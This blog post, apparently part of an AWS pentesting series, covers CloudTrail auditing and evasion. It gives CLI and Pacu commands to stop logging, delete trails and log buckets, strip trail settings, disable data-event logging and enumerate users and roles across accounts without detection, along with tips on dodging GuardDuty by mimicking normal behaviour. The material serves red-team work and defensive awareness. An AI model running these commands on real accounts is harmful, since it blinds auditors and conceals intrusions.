AWS Penetration Testing Part - 6: AWS CloudTrail Techniques, Bypasses, and Secure Configurations

March 17, 2025
AWS SecurityPentestingCloudTrail

Pentesting AWS CloudTrail

CloudTrail is a central AWS logging service used for governance, compliance, and auditing. This post explores how attackers can audit, bypass, or disrupt CloudTrail, while defenders can secure it effectively.

๐Ÿ” Auditing with CLI

1aws cloudtrail describe-trails --include-shadow-trails
2aws cloudtrail get-event-selectors --trail-name ExampleTrail --region us-east-1
3aws cloudtrail get-trail-status --name ExampleTrail --region us-east-1

Check

  • IsMultiRegionTrail: Should be true
  • IncludeGlobalServiceEvents: Should be true
  • LogFileValidationEnabled: Should be true
  • KmsKeyId: Should exist

๐Ÿ”Ž Reconnaissance via Event History

CloudTrail Event History stores 90 days of API activity and can be queried via:

1aws cloudtrail lookup-events

Useful for

  • Determining active users/services
  • Gathering instance IDs without DescribeInstances by looking at ModifyInstance or similar events

๐Ÿ•ณ Bypassing CloudTrail

๐Ÿ”‡ Using Unsupported Services

CloudTrail does not log all services. Examples

  • AppStream 2.0
  • Amplify
  • Cloud9

Exploit unlogged services and observe

1aws iam get-credential-report
2aws iam generate-service-last-accessed-details --arn arn:aws:iam::<acct>:user/<user>

๐ŸŽญ Cross Account User Enumeration (Undetected)

With your own AWS account

1run iam__enum_users --account-id 000000000000 --role-name TestRole

Similarly, enumerate roles

1run iam__enum_roles --account-id 000000000000 --role-name TestRole

๐Ÿ”ฅ Disrupting Logging

โŒ Stop Logging

1aws cloudtrail stop-logging --name ExampleTrail

๐Ÿ—‘ Delete Trail or S3 Bucket

1aws cloudtrail delete-trail --name ExampleTrail
2aws s3api delete-bucket --bucket example-for-cloudtrail-logs

๐Ÿงน Minify Logging

1aws cloudtrail update-trail --name ExampleTrail --no-include-global-service-events --no-is-multi-region-trail --no-enable-log-file-validation --kms-key-id ""

Disable all data event logging

1[
2{
3  "ReadWriteType": "ReadOnly",
4  "IncludeManagementEvents": true,
5  "DataResources": []
6}
7]
1aws cloudtrail put-event-selectors --trail-name ExampleTrail --event-selectors file://event_selectors.json

๐Ÿ›ก GuardDuty Detection

Many logging disruptions trigger GuardDuty alerts like

  • Stealth:IAMUser/CloudTrailLoggingDisabled
  • Stealth:IAMUser/LoggingConfigurationModified

But machine learning based detection may vary. Observe user behavior to mimic historical patterns and reduce detection.

โ† Previous: Advanced Services

Next: โ†’ GuardDuty